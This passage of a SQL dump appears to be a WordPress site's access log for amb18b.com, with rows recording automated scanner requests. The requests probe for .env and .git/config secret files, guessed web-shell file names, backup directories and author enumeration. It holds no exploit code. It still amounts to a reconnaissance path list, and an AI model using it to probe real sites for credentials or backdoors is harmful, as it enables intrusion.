Access',1,'2025-10-22 10:33:12','2025-10-22 10:33:12'),(141,'https://amb18b.com/33.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:14','2025-10-22 10:33:14'),(142,'https://amb18b.com/nfile.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:15','2025-10-22 10:33:15'),(143,'https://amb18b.com/ffile.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:16','2025-10-22 10:33:16'),(144,'https://amb18b.com/file18.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:17','2025-10-22 10:33:17'),(145,'https://amb18b.com/file21.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:19','2025-10-22 10:33:19'),(146,'https://amb18b.com/yellow.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:20','2025-10-22 10:33:20'),(147,'https://amb18b.com/file1.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:21','2025-10-22 10:33:21'),(148,'https://amb18b.com/geck.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:22','2025-10-22 10:33:22'),(149,'https://amb18b.com/file4.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:23','2025-10-22 10:33:23'),(150,'https://amb18b.com/file88.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:24','2025-10-22 10:33:24'),(151,'https://amb18b.com/7.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:25','2025-10-22 10:33:25'),(152,'https://amb18b.com/size.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:26','2025-10-22 10:33:26'),(153,'https://amb18b.com/bolt.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:27','2025-10-22 10:33:27'),(154,'https://amb18b.com/file8.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:29','2025-10-22 10:33:29'),(155,'https://amb18b.com/file2.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:30','2025-10-22 10:33:30'),(156,'https://amb18b.com/vee.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:31','2025-10-22 10:33:31'),(157,'https://amb18b.com/a2.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:32','2025-10-22 10:33:32'),(158,'https://amb18b.com/xxa.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:33','2025-10-22 10:33:33'),(159,'https://amb18b.com/mlex.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:34','2025-10-22 10:33:34'),(160,'https://amb18b.com/030.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:35','2025-10-22 10:33:35'),(161,'https://amb18b.com/haa.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:36','2025-10-22 10:33:36'),(162,'https://amb18b.com/xsox.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:37','2025-10-22 10:33:37'),(163,'https://amb18b.com/classgoto24.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:38','2025-10-22 10:33:38'),(164,'https://amb18b.com/inde.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:39','2025-10-22 10:33:39'),(165,'https://amb18b.com/akk.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:40','2025-10-22 10:33:40'),(166,'https://amb18b.com/alpa.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:41','2025-10-22 10:33:41'),(167,'https://amb18b.com/finny.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:42','2025-10-22 10:33:43'),(168,'https://amb18b.com/file15.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:44','2025-10-22 10:33:44'),(169,'https://amb18b.com/0x0x.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:45','2025-10-22 10:33:45'),(170,'https://amb18b.com/2clas.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:46','2025-10-22 10:33:46'),(171,'https://amb18b.com/file9.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:47','2025-10-22 10:33:47'),(172,'https://amb18b.com/aaa.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:48','2025-10-22 10:33:48'),(173,'https://amb18b.com/ilex.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:49','2025-10-22 10:33:49'),(174,'https://amb18b.com/tor.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:50','2025-10-22 10:33:50'),(175,'https://amb18b.com/klex.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:51','2025-10-22 10:33:51'),(176,'https://amb18b.com/shell1.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:52','2025-10-22 10:33:52'),(177,'https://amb18b.com/sec.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:53','2025-10-22 10:33:53'),(178,'https://amb18b.com/MF.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:54','2025-10-22 10:33:54'),(179,'https://amb18b.com/filesss.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:55','2025-10-22 10:33:55'),(180,'https://amb18b.com/ea.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:57','2025-10-22 10:33:57'),(181,'https://amb18b.com/gi.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:58','2025-10-22 10:33:58'),(182,'https://amb18b.com/10.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:59','2025-10-22 10:33:59'),(183,'https://amb18b.com/11.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:00','2025-10-22 10:34:00'),(184,'https://amb18b.com/12.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:01','2025-10-22 10:34:01'),(185,'https://amb18b.com/13.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:02','2025-10-22 10:34:02'),(186,'https://amb18b.com/hi.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:03','2025-10-22 10:34:03'),(187,'https://amb18b.com/v.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:05','2025-10-22 10:34:05'),(188,'https://amb18b.com/ar.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:06','2025-10-22 10:34:06'),(189,'https://amb18b.com/chosen.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:07','2025-10-22 10:34:07'),(190,'https://amb18b.com/article.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:09','2025-10-22 10:34:09'),(191,'https://amb18b.com/install.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:10','2025-10-22 10:34:10'),(192,'https://amb18b.com/max.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:11','2025-10-22 10:34:11'),(193,'https://amb18b.com/1.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:13','2025-10-22 10:34:13'),(194,'https://amb18b.com/bak.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:14','2025-10-22 10:34:14'),(195,'https://amb18b.com/ini.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:15','2025-10-22 10:34:15'),(196,'https://amb18b.com/mail.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:16','2025-10-22 10:34:16'),(197,'https://amb18b.com/dlu.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:17','2025-10-22 10:34:17'),(198,'https://amb18b.com/zde.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:19','2025-10-22 10:34:19'),(199,'https://amb18b.com/ifm.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:20','2025-10-22 10:34:20'),(200,'https://amb18b.com/redi.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:21','2025-10-22 10:34:21'),(201,'https://amb18b.com/fns.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:22','2025-10-22 10:34:22'),(202,'https://amb18b.com/pent.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:23','2025-10-22 10:34:23'),(203,'https://amb18b.com/wsx.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:24','2025-10-22 10:34:24'),(204,'https://amb18b.com/r79.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:25','2025-10-22 10:34:25'),(205,'https://amb18b.com/mpxct.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:26','2025-10-22 10:34:26'),(206,'https://amb18b.com/x3.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:27','2025-10-22 10:34:27'),(207,'https://amb18b.com/wan.php','74.226.158.222','Direct Access',1,'2025-10-22 10:34:29','2025-10-22 10:34:29'),(208,'https://amb18b.com/app/','34.1.25.214','Direct Access',2,'2025-10-22 11:08:02','2025-10-22 11:07:55'),(209,'https://amb18b.com/login/','34.1.25.214','Direct Access',2,'2025-10-22 11:08:05','2025-10-22 11:07:57'),(210,'https://amb18b.com/wordpress','13.77.99.66','Direct Access',1,'2025-10-22 11:39:59','2025-10-22 11:39:59'),(211,'https://amb18b.com/wp','13.77.99.66','Direct Access',1,'2025-10-22 11:40:03','2025-10-22 11:40:03'),(212,'https://amb18b.com/bc','13.77.99.66','Direct Access',1,'2025-10-22 11:40:04','2025-10-22 11:40:04'),(213,'https://amb18b.com/bk','13.77.99.66','Direct Access',1,'2025-10-22 11:40:05','2025-10-22 11:40:05'),(214,'https://amb18b.com/backup','13.77.99.66','Direct Access',1,'2025-10-22 11:40:06','2025-10-22 11:40:06'),(215,'https://amb18b.com/old','13.77.99.66','Direct Access',1,'2025-10-22 11:40:08','2025-10-22 11:40:08'),(216,'https://amb18b.com/new','13.77.99.66','Direct Access',1,'2025-10-22 11:40:09','2025-10-22 11:40:09'),(217,'https://amb18b.com/main','13.77.99.66','Direct Access',1,'2025-10-22 11:40:10','2025-10-22 11:40:10'),(218,'https://amb18b.com//wp-includes/ID3/license.txt','159.65.130.44','Direct Access',1,'2025-10-22 11:48:35','2025-10-22 11:48:35'),(219,'https://amb18b.com/?author=2','159.65.130.44','Direct Access',1,'2025-10-22 11:48:36','2025-10-22 11:48:36'),(220,'https://amb18b.com/app/','34.1.18.114','Direct Access',2,'2025-10-22 11:54:58','2025-10-22 11:54:53'),(221,'https://amb18b.com/login/','34.1.18.114','Direct Access',2,'2025-10-22 11:55:00','2025-10-22 11:54:55'),(222,'https://amb18b.com//wp-includes/wlwmanifest.xml','82.102.18.180','Direct Access',1,'2025-10-22 12:52:40','2025-10-22 12:52:40'),(223,'https://amb18b.com//?author=2','82.102.18.180','Direct Access',1,'2025-10-22 12:52:42','2025-10-22 12:52:42'),(224,'https://amb18b.com//wp-includes/wlwmanifest.xml','143.198.110.226','Direct Access',1,'2025-10-22 13:36:50','2025-10-22 13:36:50'),(225,'https://amb18b.com//?author=2','143.198.110.226','Direct Access',1,'2025-10-22 13:36:56','2025-10-22 13:36:56'),(226,'https://amb18b.com//wp-includes/wlwmanifest.xml','146.70.194.252','Direct Access',1,'2025-10-22 14:34:56','2025-10-22 14:34:56'),(227,'https://amb18b.com//?author=2','146.70.194.252','Direct Access',1,'2025-10-22 14:34:58','2025-10-22 14:34:58'),(228,'https://amb18b.com/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:49:35','2025-10-22 14:49:35'),(229,'https://amb18b.com/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:49:36','2025-10-22 14:49:36'),(230,'https://amb18b.com/.env.dev','13.209.26.132','Direct Access',1,'2025-10-22 14:49:36','2025-10-22 14:49:36'),(231,'https://amb18b.com/.env.prod','13.209.26.132','Direct Access',1,'2025-10-22 14:49:37','2025-10-22 14:49:37'),(232,'https://amb18b.com/.env.staging','13.209.26.132','Direct Access',1,'2025-10-22 14:49:38','2025-10-22 14:49:39'),(233,'https://amb18b.com/.env.development','13.209.26.132','Direct Access',1,'2025-10-22 14:49:40','2025-10-22 14:49:40'),(234,'https://amb18b.com/.env.production','13.209.26.132','Direct Access',1,'2025-10-22 14:49:42','2025-10-22 14:49:42'),(235,'https://amb18b.com/.env.test','13.209.26.132','Direct Access',1,'2025-10-22 14:49:45','2025-10-22 14:49:45'),(236,'https://amb18b.com/.env.backup','13.209.26.132','Direct Access',1,'2025-10-22 14:49:46','2025-10-22 14:49:46'),(237,'https://amb18b.com/.env.example','13.209.26.132','Direct Access',1,'2025-10-22 14:49:47','2025-10-22 14:49:47'),(238,'https://amb18b.com/.env.sample','13.209.26.132','Direct Access',1,'2025-10-22 14:49:48','2025-10-22 14:49:48'),(239,'https://amb18b.com/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:49:49','2025-10-22 14:49:49'),(240,'https://amb18b.com/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:49:51','2025-10-22 14:49:51'),(241,'https://amb18b.com/.env.save','13.209.26.132','Direct Access',1,'2025-10-22 14:49:53','2025-10-22 14:49:53'),(242,'https://amb18b.com/.env.orig','13.209.26.132','Direct Access',1,'2025-10-22 14:49:54','2025-10-22 14:49:54'),(243,'https://amb18b.com/.env.swp','13.209.26.132','Direct Access',1,'2025-10-22 14:49:55','2025-10-22 14:49:55'),(244,'https://amb18b.com/.env~','13.209.26.132','Direct Access',1,'2025-10-22 14:49:56','2025-10-22 14:49:56'),(245,'https://amb18b.com/.env.tmp','13.209.26.132','Direct Access',1,'2025-10-22 14:49:57','2025-10-22 14:49:57'),(246,'https://amb18b.com/.env.dist','13.209.26.132','Direct Access',1,'2025-10-22 14:49:59','2025-10-22 14:49:59'),(247,'https://amb18b.com/.env.json','13.209.26.132','Direct Access',1,'2025-10-22 14:50:01','2025-10-22 14:50:01'),(248,'https://amb18b.com/.env.yaml','13.209.26.132','Direct Access',1,'2025-10-22 14:50:02','2025-10-22 14:50:02'),(249,'https://amb18b.com/.env.yml','13.209.26.132','Direct Access',1,'2025-10-22 14:50:03','2025-10-22 14:50:03'),(250,'https://amb18b.com/.env.php','13.209.26.132','Direct Access',1,'2025-10-22 14:50:04','2025-10-22 14:50:04'),(251,'https://amb18b.com/.env.secrets','13.209.26.132','Direct Access',1,'2025-10-22 14:50:06','2025-10-22 14:50:06'),(252,'https://amb18b.com/.env.private','13.209.26.132','Direct Access',1,'2025-10-22 14:50:08','2025-10-22 14:50:08'),(253,'https://amb18b.com/.env.template','13.209.26.132','Direct Access',1,'2025-10-22 14:50:10','2025-10-22 14:50:10'),(254,'https://amb18b.com/.env.config','13.209.26.132','Direct Access',1,'2025-10-22 14:50:12','2025-10-22 14:50:12'),(255,'https://amb18b.com/.env.default','13.209.26.132','Direct Access',1,'2025-10-22 14:50:14','2025-10-22 14:50:14'),(256,'https://amb18b.com/admin/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:50:15','2025-10-22 14:50:15'),(257,'https://amb18b.com/admin/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:50:17','2025-10-22 14:50:17'),(258,'https://amb18b.com/admin/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:50:18','2025-10-22 14:50:18'),(259,'https://amb18b.com/admin/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:50:20','2025-10-22 14:50:20'),(260,'https://amb18b.com/api/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:50:22','2025-10-22 14:50:22'),(261,'https://amb18b.com/api/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:50:24','2025-10-22 14:50:24'),(262,'https://amb18b.com/api/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:50:25','2025-10-22 14:50:25'),(263,'https://amb18b.com/api/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:50:27','2025-10-22 14:50:27'),(264,'https://amb18b.com/app/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:50:29','2025-10-22 14:50:29'),(265,'https://amb18b.com/app/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:50:31','2025-10-22 14:50:31'),(266,'https://amb18b.com/app/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:50:33','2025-10-22 14:50:33'),(267,'https://amb18b.com/app/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:50:34','2025-10-22 14:50:34'),(268,'https://amb18b.com/config/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:50:36','2025-10-22 14:50:36'),(269,'https://amb18b.com/config/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:50:37','2025-10-22 14:50:37'),(270,'https://amb18b.com/config/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:50:39','2025-10-22 14:50:39'),(271,'https://amb18b.com/config/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:50:41','2025-10-22 14:50:41'),(272,'https://amb18b.com/src/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:50:42','2025-10-22 14:50:42'),(273,'https://amb18b.com/src/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:50:44','2025-10-22 14:50:44'),(274,'https://amb18b.com/src/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:50:46','2025-10-22 14:50:46'),(275,'https://amb18b.com/src/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:50:48','2025-10-22 14:50:48'),(276,'https://amb18b.com/public/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:50:50','2025-10-22 14:50:50'),(277,'https://amb18b.com/public/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:50:51','2025-10-22 14:50:51'),(278,'https://amb18b.com/public/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:50:53','2025-10-22 14:50:53'),(279,'https://amb18b.com/public/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:50:55','2025-10-22 14:50:55'),(280,'https://amb18b.com/assets/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:50:56','2025-10-22 14:50:56'),(281,'https://amb18b.com/assets/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:50:57','2025-10-22 14:50:57'),(282,'https://amb18b.com/assets/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:50:59','2025-10-22 14:50:59'),(283,'https://amb18b.com/assets/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:01','2025-10-22 14:51:01'),(284,'https://amb18b.com/includes/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:02','2025-10-22 14:51:02'),(285,'https://amb18b.com/includes/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:03','2025-10-22 14:51:03'),(286,'https://amb18b.com/includes/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:05','2025-10-22 14:51:05'),(287,'https://amb18b.com/includes/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:06','2025-10-22 14:51:06'),(288,'https://amb18b.com/lib/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:07','2025-10-22 14:51:07'),(289,'https://amb18b.com/lib/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:08','2025-10-22 14:51:08'),(290,'https://amb18b.com/lib/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:09','2025-10-22 14:51:09'),(291,'https://amb18b.com/lib/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:11','2025-10-22 14:51:11'),(292,'https://amb18b.com/application/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:13','2025-10-22 14:51:13'),(293,'https://amb18b.com/application/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:13','2025-10-22 14:51:13'),(294,'https://amb18b.com/application/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:15','2025-10-22 14:51:15'),(295,'https://amb18b.com/application/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:16','2025-10-22 14:51:16'),(296,'https://amb18b.com/system/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:18','2025-10-22 14:51:18'),(297,'https://amb18b.com/system/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:19','2025-10-22 14:51:19'),(298,'https://amb18b.com/system/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:19','2025-10-22 14:51:19'),(299,'https://amb18b.com/system/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:21','2025-10-22 14:51:21'),(300,'https://amb18b.com/core/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:23','2025-10-22 14:51:23'),(301,'https://amb18b.com/core/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:25','2025-10-22 14:51:25'),(302,'https://amb18b.com/core/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:26','2025-10-22 14:51:26'),(303,'https://amb18b.com/core/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:29','2025-10-22 14:51:29'),(304,'https://amb18b.com/modules/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:31','2025-10-22 14:51:31'),(305,'https://amb18b.com/modules/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:33','2025-10-22 14:51:33'),(306,'https://amb18b.com/modules/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:35','2025-10-22 14:51:35'),(307,'https://amb18b.com/modules/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:40','2025-10-22 14:51:40'),(308,'https://amb18b.com/plugins/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:41','2025-10-22 14:51:41'),(309,'https://amb18b.com/plugins/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:43','2025-10-22 14:51:43'),(310,'https://amb18b.com/plugins/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:44','2025-10-22 14:51:44'),(311,'https://amb18b.com/plugins/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:45','2025-10-22 14:51:45'),(312,'https://amb18b.com/themes/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:48','2025-10-22 14:51:48'),(313,'https://amb18b.com/themes/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:49','2025-10-22 14:51:49'),(314,'https://amb18b.com/themes/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:50','2025-10-22 14:51:50'),(315,'https://amb18b.com/themes/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:51:51','2025-10-22 14:51:51'),(316,'https://amb18b.com/vendor/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:51:54','2025-10-22 14:51:54'),(317,'https://amb18b.com/vendor/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:51:56','2025-10-22 14:51:56'),(318,'https://amb18b.com/vendor/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:51:59','2025-10-22 14:51:59'),(319,'https://amb18b.com/vendor/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:52:01','2025-10-22 14:52:01'),(320,'https://amb18b.com/storage/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:52:04','2025-10-22 14:52:04'),(321,'https://amb18b.com/storage/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:52:07','2025-10-22 14:52:07'),(322,'https://amb18b.com/storage/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:52:11','2025-10-22 14:52:11'),(323,'https://amb18b.com/storage/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:52:11','2025-10-22 14:52:11'),(324,'https://amb18b.com/backend/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:52:12','2025-10-22 14:52:12'),(325,'https://amb18b.com/backend/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:52:15','2025-10-22 14:52:15'),(326,'https://amb18b.com/backend/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:52:18','2025-10-22 14:52:18'),(327,'https://amb18b.com/backend/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:52:19','2025-10-22 14:52:19'),(328,'https://amb18b.com/frontend/.env','13.209.26.132','Direct Access',1,'2025-10-22 14:52:21','2025-10-22 14:52:21'),(329,'https://amb18b.com/frontend/.env.local','13.209.26.132','Direct Access',1,'2025-10-22 14:52:23','2025-10-22 14:52:23'),(330,'https://amb18b.com/frontend/.env.bak','13.209.26.132','Direct Access',1,'2025-10-22 14:52:26','2025-10-22 14:52:26'),(331,'https://amb18b.com/frontend/.env.old','13.209.26.132','Direct Access',1,'2025-10-22 14:52:28','2025-10-22 14:52:28'),(332,'https://amb18b.com/.env','194.26.192.110','Direct Access',1,'2025-10-22 16:02:50','2025-10-22 16:02:50'),(333,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.134.67.40','Direct Access',1,'2025-10-22 16:26:59','2025-10-22 16:26:59'),(334,'https://amb18b.com//?author=2','34.134.67.40','Direct Access',1,'2025-10-22 16:27:05','2025-10-22 16:27:05'),(335,'https://amb18b.com/wordpress','13.90.208.94','Direct Access',1,'2025-10-22 18:11:47','2025-10-22 18:11:47'),(336,'https://amb18b.com/wp','13.90.208.94','Direct Access',1,'2025-10-22 18:11:50','2025-10-22 18:11:50'),(337,'https://amb18b.com/bc','13.90.208.94','Direct Access',1,'2025-10-22 18:11:52','2025-10-22 18:11:52'),(338,'https://amb18b.com/bk','13.90.208.94','Direct Access',1,'2025-10-22 18:11:53','2025-10-22 18:11:53'),(339,'https://amb18b.com/backup','13.90.208.94','Direct Access',1,'2025-10-22 18:11:54','2025-10-22 18:11:54'),(340,'https://amb18b.com/old','13.90.208.94','Direct Access',1,'2025-10-22 18:11:56','2025-10-22 18:11:56'),(341,'https://amb18b.com/new','13.90.208.94','Direct Access',1,'2025-10-22 18:11:57','2025-10-22 18:11:57'),(342,'https://amb18b.com/main','13.90.208.94','Direct Access',1,'2025-10-22 18:11:58','2025-10-22 18:11:58'),(343,'https://amb18b.com//wp-includes/wlwmanifest.xml','35.239.93.140','Direct Access',1,'2025-10-22 19:04:57','2025-10-22 19:04:57'),(344,'https://amb18b.com//?author=2','35.239.93.140','Direct Access',1,'2025-10-22 19:05:01','2025-10-22 19:05:01'),(345,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.26.96.24','Direct Access',1,'2025-10-22 19:22:35','2025-10-22 19:22:35'),(346,'https://amb18b.com//?author=2','34.26.96.24','Direct Access',1,'2025-10-22 19:22:38','2025-10-22 19:22:38'),(347,'https://amb18b.com/.git/config','195.178.110.223','Direct Access',1,'2025-10-22 19:56:09','2025-10-22 19:56:09'),(348,'https://amb18b.com//wp-includes/wlwmanifest.xml','45.154.98.70','Direct Access',1,'2025-10-22 22:08:41','2025-10-22 22:08:41'),(349,'https://amb18b.com//?author=2','45.154.98.70','Direct Access',1,'2025-10-22 22:08:42','2025-10-22 22:08:42'),(350,'https://amb18b.com/style.php','193.36.224.24','Direct Access',1,'2025-10-22 23:04:31','2025-10-22 23:04:31'),(351,'https://amb18b.com/wp-admin/style.php','216.24.219.8','Direct Access',1,'2025-10-22 23:04:38','2025-10-22 23:04:38'),(352,'https://amb18b.com/wp-includes/style.php','193.36.224.78','Direct Access',1,'2025-10-22 23:04:41','2025-10-22 23:04:41'),(353,'https://amb18b.com/chosen.php?p=','193.36.224.80','Direct Access',1,'2025-10-22 23:04:43','2025-10-22 23:04:43'),(354,'https://amb18b.com/file.php','216.24.219.7','Direct Access',1,'2025-10-22 23:04:45','2025-10-22 23:04:45'),(355,'https://amb18b.com/flower.php','136.144.19.43','Direct Access',1,'2025-10-22 23:04:46','2025-10-22 23:04:46'),(356,'https://amb18b.com/gifclass.php','193.36.224.80','Direct Access',1,'2025-10-22 23:04:48','2025-10-22 23:04:48'),(357,'https://amb18b.com/bless.php','104.234.19.75','Direct Access',1,'2025-10-22 23:04:50','2025-10-22 23:04:50'),(358,'https://amb18b.com/class-t.api.php','136.144.19.5','Direct Access',1,'2025-10-22 23:04:52','2025-10-22 23:04:52'),(359,'https://amb18b.com/blurbs.php','136.144.19.42','Direct Access',1,'2025-10-22 23:04:54','2025-10-22 23:04:54'),(360,'https://amb18b.com/akcc.php','104.234.19.70','Direct Access',1,'2025-10-22 23:04:56','2025-10-22 23:04:56'),(361,'https://amb18b.com/abcd.php','136.144.19.175','Direct Access',1,'2025-10-22 23:04:58','2025-10-22 23:04:58'),(362,'https://amb18b.com/aku.php','193.36.224.78','Direct Access',1,'2025-10-22 23:04:59','2025-10-22 23:04:59'),(363,'https://amb18b.com/bs5.php','193.36.224.78','Direct Access',1,'2025-10-22 23:05:01','2025-10-22 23:05:01'),(364,'https://amb18b.com/wp-includes/js/thickbox/thickbox.php','193.36.224.203','Direct Access',1,'2025-10-22 23:05:03','2025-10-22 23:05:03'),(365,'https://amb18b.com/akc.php','216.24.219.6','Direct Access',1,'2025-10-22 23:05:05','2025-10-22 23:05:05'),(366,'https://amb18b.com/zoo.php','193.36.224.143','Direct Access',1,'2025-10-22 23:05:07','2025-10-22 23:05:07'),(367,'https://amb18b.com//zwso.php','193.36.224.83','Direct Access',1,'2025-10-22 23:05:08','2025-10-22 23:05:08'),(368,'https://amb18b.com/bolt.php','136.144.19.5','Direct Access',1,'2025-10-22 23:05:12','2025-10-22 23:05:12'),(369,'https://amb18b.com/shlo.php','104.234.19.77','Direct Access',1,'2025-10-22 23:05:14','2025-10-22 23:05:14'),(370,'https://amb18b.com/1.php','104.234.19.73','Direct Access',1,'2025-10-22 23:05:16','2025-10-22 23:05:16'),(371,'https://amb18b.com/aa.php','136.144.19.86','Direct Access',1,'2025-10-22 23:05:18','2025-10-22 23:05:18'),(372,'https://amb18b.com/fileWP.php','193.36.224.78','Direct Access',1,'2025-10-22 23:05:19','2025-10-22 23:05:19'),(373,'https://amb18b.com/witmm.php','136.144.19.177','Direct Access',1,'2025-10-22 23:05:21','2025-10-22 23:05:21'),(374,'https://amb18b.com/files.php','104.234.19.68','Direct Access',1,'2025-10-22 23:05:23','2025-10-22 23:05:23'),(375,'https://amb18b.com/wp-editor.php','136.144.19.47','Direct Access',1,'2025-10-22 23:05:25','2025-10-22 23:05:25'),(376,'https://amb18b.com/abcd.php','40.69.165.140','Direct Access',1,'2025-10-23 00:13:13','2025-10-23 